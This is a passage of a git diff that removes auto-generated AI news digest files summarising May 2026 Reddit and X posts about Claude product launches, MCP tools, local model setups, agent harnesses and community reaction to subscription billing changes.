to nine major legal platforms](https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: mcp, product_launch - -> Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. 
The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html) - ---- - -## [A fully autonomous browser runtime for any AI agents](https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. 
Please take a look and let me know: - ---- - -## [I built a native macOS app to manage Claude Code sessions, accounts, and projects](https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: cli_tool, tool_update - -> I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features! - ---- - -## [Fast mode for Claude Opus 4.7 is now available on the api.](https://x.com/DailyXplorer/status/2054464151234228372) -*X search / AI model updates* | 13/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Fast mode for Claude Opus 4.7 is now available on the api. - ---- - -## [Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. 
So I'm building Update Night, the searchable home for every AI t…](https://x.com/jiaweihq/status/2054463419722707134) -*X search / Agent workflows* | 13/05/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth - ---- - -## [Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling](https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of "AI did the work for me". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. 
If you've benchmarked Qwen3 tool-calling fail… - ---- - -## [I built a local GUI + AI builder for creating ComfyUI custom node packs](https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/) -*Reddit r/StableDiffusion* | 13/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next? - ---- - diff --git a/data/digest-2026-05-14.md b/data/digest-2026-05-14.md deleted file mode 100644 index c62ad7a..0000000 --- a/data/digest-2026-05-14.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-14** | 15 stories | Auto-generated from 592 archived stories - ---- - -## [The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.](https://x.com/OpenAIDevs/status/2051725072873001338) -*X / @openaidevs* | 05/05/2026 | Score: 1.00 -Tags: api_update, product_launch, open_source, developer_tool, tool_update - -> The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in. 
- ---- - -## [Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)](https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: mcp, open_source, agent_tool - -> Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. [github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions! - ---- - -## [Simpler self hosted alt to Open WebUI](https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, tool_update - -> Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that "just works". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. 
[Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome! - ---- - -## [My AI runs 24/7 on Claude Code without -p. Here's the hook to do it yourself.](https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: api_update, product_launch, developer_tool - -> **Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. 
**What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work… - ---- - -## [[N] LangChain Interrupt 2026 announcements [N]](https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/) -*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. 
**Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t… - ---- - -## [A VERY lightweight open web-search tool for smaller local LLMs](https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. Still rough in places, but it’s been useful enough fo… - ---- - -## [Stable Diffusion WebUI Forge for AMD GPU](https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/) -*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> It was a f\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... 
i am gonna share the files that made it possible. "Proof pics" "[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)" *The link should look like this* [\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files "down bellow in the picture" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\"\_\_\_\_\_\_\_\_\_\_\_\\" in case u are copying i… - ---- - -## [Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?](https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. 
**I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *"Just use Sonnet for the cheap parts."* The easy answer. But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured… - ---- - -## [Automated AI researcher running locally with llama.cpp](https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include. 
- ---- - -## [OpenAI's deployment company move says more about the AI gap than any benchmark[D]](https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/) -*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \~150 engineers). The pitch: embed "Forward Deployed Engineers" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between "model capability" and "production deployment" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. For the ML community this should… - ---- - -## [You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits](https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. 
You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. Seeing people now publishing workarounds instead of going A… - ---- - -## [I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.](https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no "any". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. 
Here's what I found out: Claude Code (Opus 4.7): \- Verified MCP before writing a line \- Built 36 files in 12 minutes \- Wrote its own WebSocket smoke test (3ms broadcast) \- Zero errors first run \- Total cost: \~$2.50 Codex (GPT-5.5 via Cursor): \- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \- Task 2 shipped but needed a patch for infinite React loop \- 28 files, more compact architecture \- Total cost: \~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. For co… - ---- - -## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/) -*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. 
| [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?… - ---- - -## [Fully Realtime Interaction Models](https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/) -*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/) - ---- - -## [Open-source, self-updating wiki for your codebase](https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/) -*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work. 
- ---- - diff --git a/data/digest-2026-05-15.md b/data/digest-2026-05-15.md deleted file mode 100644 index 6efc82d..0000000 --- a/data/digest-2026-05-15.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-15** | 15 stories | Auto-generated from 629 archived stories - ---- - -## [Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?](https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, mcp, tool_update - -> Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? Would love to hear real-world workflows instead of generic AI tips. 
- ---- - -## [I built a free Google search MCP that actually works(searching, fetching, with PDF)](https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> ✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: "abstract"` returns \~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\~1500 chars), letting the agent triage relevance, then call `extract` with `mode… - ---- - -## [Claude for Healthcare launched in January — but medical imaging is the obvious gap. Anyone else noticing?](https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). 
When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call. - ---- - -## [Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?](https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> built an open source memory layer for ai agents. thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. 
lead with "observability and accountability for ai agents" instead of "memory for ai agents". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months - ---- - -## [I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.](https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback. - ---- - -## [Built a tool that publishes HTML artifacts securely behind company auth](https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Hey! 
Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course. - ---- - -## [Anthropic built the agentic features. Now they're billing them separately.](https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic ("this was inevitable, the old model was broken") - About 15% neutral to supportive ("interactive use is untouched, this is fair") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. 
He said he now has to make the Claude Code experience on T3 Code "significantly worse." Ben Hylak (co-founder of Raindrop.ai) responded: "This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs." Theo also said: "Framing this as a free credit instead of a regression for… - ---- - -## [Adaptive Markdown](https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \-Turning articles and books into personalized learning objects \- lecture notes with automatically maintained structure \-documents with embedded code, tables, consoles, images, audio, or video \-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat… - ---- - -## [Memory drift? Context bloat? 
A Claude Code skill I wrote to manage long-running memory libraries](https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 0.99 -Tags: api_update, developer_tool - -> I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for "that bug we fixed last month" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** "Audit memory" runs the script. "Review session" walks the recent session and surfaces what's worth keeping.… - ---- - -## [SailPoint Unveils Agentic Fabric for AI 